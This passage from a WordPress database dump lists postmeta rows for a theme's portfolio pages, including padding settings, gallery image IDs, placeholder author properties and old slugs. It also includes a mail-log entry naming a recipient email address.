0 100px 0'),(40023,3091,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40024,3091,'portfolio_single_back_to_link','610'),(40025,3091,'mkdf_disable_vertical_header_background_image_meta','no'),(40026,3091,'mkdf_disable_header_widget_areas_meta','no'),(40027,3091,'slide_template','default'),(40028,3091,'_wpb_vc_js_status','false'),(40029,3091,'mkdf-portfolio-image-gallery','565,566,567'),(40030,3091,'mkdf_portfolio_single_template_meta','images'),(40031,3091,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40032,3091,'_dp_original','648'),(40033,3091,'_thumbnail_id','1103'),(40034,3091,'_wp_old_slug','h6-9'),(40035,2843,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40036,2843,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40037,2843,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40038,2843,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40039,2843,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40040,2843,'_wp_page_template','full-width.php'),(40041,2843,'slide_template','default'),(40042,2843,'_wpb_vc_js_status','true'),(40043,2843,'mkdf_page_content_behind_header_meta','no'),(40044,2843,'mkdf_page_content_padding','30px 30px 50px 30px'),(40045,2843,'mkdf_page_content_padding_mobile','30px 30px 50px 30px'),(40046,2843,'mkdf_disable_vertical_header_background_image_meta','no'),(40047,2843,'mkdf_disable_header_widget_areas_meta','no'),(40048,2843,'mkdf_title_area_type_meta','attika'),(40049,2843,'_dp_original','1192'),(40050,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40051,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40052,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40053,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40054,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40055,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40056,2857,'_wp_page_template','full-width.php'),(40057,2857,'slide_template','default'),(40058,2857,'_wpb_vc_js_status','true'),(40059,2857,'mkdf_page_content_behind_header_meta','no'),(40060,2857,'mkdf_page_content_padding','30px 30px 50px 30px'),(40061,2857,'mkdf_page_content_padding_mobile','30px 30px 50px 30px'),(40062,2857,'mkdf_disable_vertical_header_background_image_meta','no'),(40063,2857,'mkdf_disable_header_widget_areas_meta','no'),(40064,2857,'mkdf_title_area_type_meta','attika'),(40065,2857,'_dp_original','2843'),(40066,3092,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40067,3092,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40069,3092,'mkdf_page_content_behind_header_meta','no'),(40070,3092,'mkdf_page_content_padding','115px 0 100px 0'),(40071,3092,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40072,3092,'portfolio_single_back_to_link','664'),(40073,3092,'mkdf_disable_vertical_header_background_image_meta','no'),(40074,3092,'mkdf_disable_header_widget_areas_meta','no'),(40075,3092,'slide_template','default'),(40076,3092,'_wpb_vc_js_status','false'),(40077,3092,'mkdf-portfolio-image-gallery','565,566,567'),(40078,3092,'mkdf_portfolio_single_template_meta','images'),(40079,3092,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40080,3092,'_dp_original','104'),(40081,3092,'_wp_old_slug','h4-1'),(40082,3093,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40083,3093,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40084,3093,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40086,3093,'mkdf_page_content_behind_header_meta','no'),(40087,3093,'mkdf_page_content_padding','115px 0 100px 0'),(40088,3093,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40089,3093,'portfolio_single_back_to_link','664'),(40090,3093,'mkdf_disable_vertical_header_background_image_meta','no'),(40091,3093,'mkdf_disable_header_widget_areas_meta','no'),(40092,3093,'slide_template','default'),(40093,3093,'_wpb_vc_js_status','true'),(40094,3093,'mkdf-portfolio-image-gallery','567,566,565'),(40095,3093,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40096,3093,'mkdf_portfolio_single_template_meta','small-images'),(40097,3093,'_dp_original','136'),(40098,3093,'_wp_old_slug','h4-2'),(40099,3094,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40100,3094,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40101,3094,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52281,4373,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40103,3094,'mkdf_page_content_behind_header_meta','no'),(40104,3094,'mkdf_page_content_padding','115px 0 100px 0'),(40105,3094,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40106,3094,'portfolio_single_back_to_link','664'),(40107,3094,'mkdf_disable_vertical_header_background_image_meta','no'),(40108,3094,'mkdf_disable_header_widget_areas_meta','no'),(40109,3094,'slide_template','default'),(40110,3094,'_wpb_vc_js_status','true'),(40111,3094,'mkdf-portfolio-image-gallery','567,566,565'),(40112,3094,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40113,3094,'mkdf_portfolio_single_template_meta','slider'),(40114,3094,'_dp_original','141'),(40115,3094,'_wp_old_slug','h4-3'),(40116,3095,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40117,3095,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40118,3095,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40119,3095,'_thumbnail_id','1059'),(40120,3095,'mkdf_page_content_behind_header_meta','no'),(40121,3095,'mkdf_page_content_padding','115px 0 100px 0'),(40122,3095,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40123,3095,'portfolio_single_back_to_link','84'),(40124,3095,'mkdf_disable_vertical_header_background_image_meta','no'),(40125,3095,'mkdf_disable_header_widget_areas_meta','no'),(40126,3095,'slide_template','default'),(40127,3095,'_wpb_vc_js_status','true'),(40128,3095,'mkdf-portfolio-image-gallery','567,566,565'),(40129,3095,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40130,3095,'mkdf_portfolio_single_template_meta','small-images'),(40131,3095,'_dp_original','136'),(40132,3095,'_wp_old_slug','h1-2-2'),(40133,3095,'_wp_old_slug','h2-1'),(40134,3095,'_wp_old_slug','h2-4'),(40135,3095,'_wp_old_slug','kakalamba-appetizer'),(40136,3096,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40137,3096,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40138,3096,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40139,3096,'_thumbnail_id','1058'),(40140,3096,'mkdf_page_content_behind_header_meta','no'),(40141,3096,'mkdf_page_content_padding','115px 0 100px 0'),(40142,3096,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40143,3096,'portfolio_single_back_to_link','84'),(40144,3096,'mkdf_disable_vertical_header_background_image_meta','no'),(40145,3096,'mkdf_disable_header_widget_areas_meta','no'),(40146,3096,'slide_template','default'),(40147,3096,'_wpb_vc_js_status','true'),(40148,3096,'mkdf-portfolio-image-gallery','567,566,565'),(40149,3096,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40150,3096,'mkdf_portfolio_single_template_meta','slider'),(40151,3096,'_dp_original','141'),(40152,3096,'_wp_old_slug','h2-3'),(40153,3097,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40154,3097,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40155,3097,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40156,3097,'_thumbnail_id','1057'),(40157,3097,'mkdf_page_content_behind_header_meta','no'),(40158,3097,'mkdf_page_content_padding','115px 0 100px 0'),(40159,3097,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40160,3097,'portfolio_single_back_to_link','84'),(40161,3097,'mkdf_disable_vertical_header_background_image_meta','no'),(40162,3097,'mkdf_disable_header_widget_areas_meta','no'),(40163,3097,'slide_template','default'),(40164,3097,'_wpb_vc_js_status','true'),(40165,3097,'mkdf-portfolio-image-gallery','565,566,567'),(40166,3097,'mkdf_portfolio_single_template_meta','small-slider'),(40167,3097,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40168,3097,'_dp_original','568'),(40169,3097,'_wp_old_slug','h2-2'),(40170,3098,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40171,3098,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40172,3098,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40173,3098,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40174,3098,'mkdf_page_content_behind_header_meta','no'),(40175,3098,'mkdf_page_content_padding','115px 0 100px 0'),(40176,3098,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40177,3098,'portfolio_single_back_to_link','84'),(40178,3098,'mkdf_disable_vertical_header_background_image_meta','no'),(40179,3098,'mkdf_disable_header_widget_areas_meta','no'),(40180,3098,'slide_template','default'),(40181,3098,'_wpb_vc_js_status','true'),(40182,3098,'mkdf-portfolio-image-gallery','567,566,565'),(40183,3098,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40184,3098,'mkdf_portfolio_single_template_meta','gallery'),(40185,3098,'_thumbnail_id','1056'),(40186,3098,'_dp_original','580'),(40187,3098,'_wp_old_slug','h2-1'),(40188,3099,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40189,3099,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40190,3099,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40191,3099,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52232,4368,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40193,3099,'mkdf_page_content_behind_header_meta','no'),(40194,3099,'mkdf_page_content_padding','115px 0 100px 0'),(40195,3099,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40196,3099,'portfolio_single_back_to_link','1008'),(40197,3099,'mkdf_disable_vertical_header_background_image_meta','no'),(40198,3099,'mkdf_disable_header_widget_areas_meta','no'),(40199,3099,'slide_template','default'),(40200,3099,'_wpb_vc_js_status','true'),(40201,3099,'mkdf-portfolio-image-gallery','567,566,565'),(40202,3099,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40203,3099,'mkdf_portfolio_single_template_meta','small-images'),(40204,3099,'_wp_old_slug','h1-2-2'),(40205,3099,'_wp_old_slug','h2-1'),(40206,3099,'_dp_original','933'),(40207,3099,'_wp_old_slug','h7-4'),(40208,3100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40209,3100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40210,3100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40211,3100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40212,3100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40213,3100,'mkdf_page_content_behind_header_meta','no'),(40214,3100,'mkdf_page_content_padding','115px 0 100px 0'),(40215,3100,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40216,3100,'portfolio_single_back_to_link','1008'),(40217,3100,'mkdf_disable_vertical_header_background_image_meta','no'),(40218,3100,'mkdf_disable_header_widget_areas_meta','no'),(40219,3100,'slide_template','default'),(40220,3100,'_wpb_vc_js_status','true'),(40221,3100,'mkdf-portfolio-image-gallery','567,566,565'),(40222,3100,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40223,3100,'mkdf_portfolio_single_template_meta','gallery'),(52227,4368,'_menu_item_object','custom'),(40225,3100,'_dp_original','936'),(40226,3100,'_wp_old_slug','h7-1'),(40227,3100,'_wp_old_slug','vegetable-cream-soup__trashed'),(40228,3101,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40229,3101,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40230,3101,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40231,3101,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40232,3101,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40233,3101,'mkdf_page_content_behind_header_meta','no'),(40234,3101,'mkdf_page_content_padding','115px 0 100px 0'),(40235,3101,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40236,3101,'portfolio_single_back_to_link','1008'),(40237,3101,'mkdf_disable_vertical_header_background_image_meta','no'),(40238,3101,'mkdf_disable_header_widget_areas_meta','no'),(40239,3101,'slide_template','default'),(40240,3101,'_wpb_vc_js_status','true'),(40241,3101,'mkdf-portfolio-image-gallery','567,566,565'),(40242,3101,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40243,3101,'mkdf_portfolio_single_template_meta','slider'),(40244,3101,'_thumbnail_id','1030'),(40245,3101,'_dp_original','1021'),(40246,3101,'_wp_old_slug','h7-5'),(40247,3102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40248,3102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40249,3102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40250,3102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40251,3102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40253,3102,'mkdf_page_content_behind_header_meta','no'),(40254,3102,'mkdf_page_content_padding','115px 0 100px 0'),(40255,3102,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40256,3102,'portfolio_single_back_to_link','1008'),(40257,3102,'mkdf_disable_vertical_header_background_image_meta','no'),(40258,3102,'mkdf_disable_header_widget_areas_meta','no'),(40259,3102,'slide_template','default'),(40260,3102,'_wpb_vc_js_status','true'),(40261,3102,'mkdf-portfolio-image-gallery','567,566,565'),(40262,3102,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40263,3102,'mkdf_portfolio_single_template_meta','small-images'),(40264,3102,'_wp_old_slug','h1-2-2'),(40265,3102,'_wp_old_slug','h2-1'),(40266,3102,'_dp_original','1019'),(40267,3102,'_wp_old_slug','h7-6'),(40268,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40269,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40270,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40271,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40272,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40273,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40275,2344,'mkdf_page_content_behind_header_meta','no'),(40276,2344,'mkdf_page_content_padding','115px 0 100px 0'),(40277,2344,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40278,2344,'portfolio_single_back_to_link','1008'),(40279,2344,'mkdf_disable_vertical_header_background_image_meta','no'),(40280,2344,'mkdf_disable_header_widget_areas_meta','no'),(40281,2344,'slide_template','default'),(40282,2344,'_wpb_vc_js_status','true'),(40283,2344,'mkdf-portfolio-image-gallery','567,566,565'),(40284,2344,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40285,2344,'mkdf_portfolio_single_template_meta','small-images'),(40286,2344,'_wp_old_slug','h1-2-2'),(40287,2344,'_wp_old_slug','h2-1'),(40288,2344,'_wp_old_slug','h7-6'),(40289,2344,'_dp_original','1048'),(40290,2345,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40291,2345,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40292,2345,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40293,2345,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40294,2345,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52250,4370,'_menu_item_url','#'),(40296,2345,'mkdf_page_content_behind_header_meta','no'),(40297,2345,'mkdf_page_content_padding','115px 0 100px 0'),(40298,2345,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40299,2345,'portfolio_single_back_to_link','1008'),(40300,2345,'mkdf_disable_vertical_header_background_image_meta','no'),(40301,2345,'mkdf_disable_header_widget_areas_meta','no'),(40302,2345,'slide_template','default'),(40303,2345,'_wpb_vc_js_status','true'),(40304,2345,'mkdf-portfolio-image-gallery','565,566,567'),(40305,2345,'mkdf_portfolio_single_template_meta','small-slider'),(40306,2345,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40307,2345,'_wp_old_slug','h7-2'),(40308,2345,'_dp_original','1020'),(40309,2898,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40310,2898,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40311,2898,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40312,2898,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40313,2898,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40314,2898,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40315,2898,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40316,2898,'mkdf_page_content_behind_header_meta','no'),(40317,2898,'mkdf_page_content_padding','115px 0 100px 0'),(40318,2898,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40319,2898,'portfolio_single_back_to_link','569'),(40320,2898,'mkdf_disable_vertical_header_background_image_meta','no'),(40321,2898,'mkdf_disable_header_widget_areas_meta','no'),(40322,2898,'slide_template','default'),(40323,2898,'_wpb_vc_js_status','true'),(40324,2898,'mkdf-portfolio-image-gallery','567,566,565'),(40325,2898,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40326,2898,'mkdf_portfolio_single_template_meta','small-slider'),(40327,2898,'_thumbnail_id','594'),(40328,2898,'_wp_old_slug','h8-6'),(40329,2898,'_dp_original','592'),(40330,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40331,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40332,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40333,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40334,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40335,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40336,2899,'_thumbnail_id','591'),(40337,2899,'mkdf_page_content_behind_header_meta','no'),(40338,2899,'mkdf_page_content_padding','115px 0 100px 0'),(40339,2899,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40340,2899,'portfolio_single_back_to_link','569'),(40341,2899,'mkdf_disable_vertical_header_background_image_meta','no'),(40342,2899,'mkdf_disable_header_widget_areas_meta','no'),(40343,2899,'slide_template','default'),(40344,2899,'_wpb_vc_js_status','true'),(40345,2899,'mkdf-portfolio-image-gallery','567,566,565'),(40346,2899,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40347,2899,'mkdf_portfolio_single_template_meta','slider'),(40348,2899,'_wp_old_slug','h8-5'),(40349,2899,'_dp_original','590'),(40350,2900,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40351,2900,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40352,2900,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40353,2900,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40354,2900,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40355,2900,'_thumbnail_id','589'),(40356,2900,'mkdf_page_content_behind_header_meta','no'),(40357,2900,'mkdf_page_content_padding','115px 0 100px 0'),(40358,2900,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40359,2900,'portfolio_single_back_to_link','569'),(40360,2900,'mkdf_disable_vertical_header_background_image_meta','no'),(40361,2900,'mkdf_disable_header_widget_areas_meta','no'),(40362,2900,'slide_template','default'),(40363,2900,'_wpb_vc_js_status','true'),(40364,2900,'mkdf-portfolio-image-gallery','567,566,565'),(40365,2900,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40366,2900,'mkdf_portfolio_single_template_meta','masonry'),(40367,2900,'_wp_old_slug','h8-4'),(40368,2900,'_dp_original','588'),(40369,2901,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40370,2901,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40371,2901,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40372,2901,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40373,2901,'_thumbnail_id','584'),(40374,2901,'mkdf_page_content_behind_header_meta','no'),(40375,2901,'mkdf_page_content_padding','115px 0 100px 0'),(40376,2901,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40377,2901,'portfolio_single_back_to_link','569'),(40378,2901,'mkdf_disable_vertical_header_background_image_meta','no'),(40379,2901,'mkdf_disable_header_widget_areas_meta','no'),(40380,2901,'slide_template','default'),(40381,2901,'_wpb_vc_js_status','true'),(40382,2901,'mkdf-portfolio-image-gallery','567,566,565'),(40383,2901,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40384,2901,'mkdf_portfolio_single_template_meta','small-images'),(40385,2901,'_wp_old_slug','h8-3'),(40386,2901,'_dp_original','583'),(40387,2902,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40388,2902,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40389,2902,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40390,2902,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40391,2902,'mkdf_page_content_behind_header_meta','no'),(40392,2902,'mkdf_page_content_padding','115px 0 100px 0'),(40393,2902,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40394,2902,'portfolio_single_back_to_link','569'),(40395,2902,'mkdf_disable_vertical_header_background_image_meta','no'),(40396,2902,'mkdf_disable_header_widget_areas_meta','no'),(40397,2902,'slide_template','default'),(40398,2902,'_wpb_vc_js_status','true'),(40399,2902,'mkdf-portfolio-image-gallery','567,566,565'),(40400,2902,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40401,2902,'mkdf_portfolio_single_template_meta','gallery'),(40403,2902,'_wp_old_slug','h8-2'),(40404,2902,'_dp_original','580'),(40405,2903,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40406,2903,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40407,2903,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40408,2903,'_thumbnail_id','571'),(40409,2903,'mkdf_page_content_behind_header_meta','no'),(40410,2903,'mkdf_page_content_padding','115px 0 100px 0'),(40411,2903,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40412,2903,'portfolio_single_back_to_link','569'),(40413,2903,'mkdf_disable_vertical_header_background_image_meta','no'),(40414,2903,'mkdf_disable_header_widget_areas_meta','no'),(40415,2903,'slide_template','default'),(40416,2903,'_wpb_vc_js_status','true'),(40417,2903,'mkdf-portfolio-image-gallery','565,566,567'),(40418,2903,'mkdf_portfolio_single_template_meta','small-slider'),(40419,2903,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40420,2903,'_wp_old_slug','h8-1'),(40421,2903,'_dp_original','568'),(40422,2930,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40423,2930,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40424,2930,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40425,2930,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40426,2930,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40427,2930,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52249,4370,'_menu_item_xfn',''),(40429,2930,'mkdf_page_content_behind_header_meta','no'),(40430,2930,'mkdf_page_content_padding','115px 0 100px 0'),(40431,2930,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(40432,2930,'portfolio_single_back_to_link','1008'),(40433,2930,'mkdf_disable_vertical_header_background_image_meta','no'),(40434,2930,'mkdf_disable_header_widget_areas_meta','no'),(40435,2930,'slide_template','default'),(40436,2930,'_wpb_vc_js_status','true'),(40437,2930,'mkdf-portfolio-image-gallery','565,566,567'),(40438,2930,'mkdf_portfolio_single_template_meta','small-slider'),(40439,2930,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(40440,2930,'_wp_old_slug','h7-2'),(40441,2930,'_dp_original','2345'),(44553,3972,'solution','All good, mail sent.'),(40444,1,'_mkdf-like','0'),(44559,3972,'original_to','franzoni.elena@gmail.com'),(40488,1446,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(40489,1446,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(40490,1446,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px 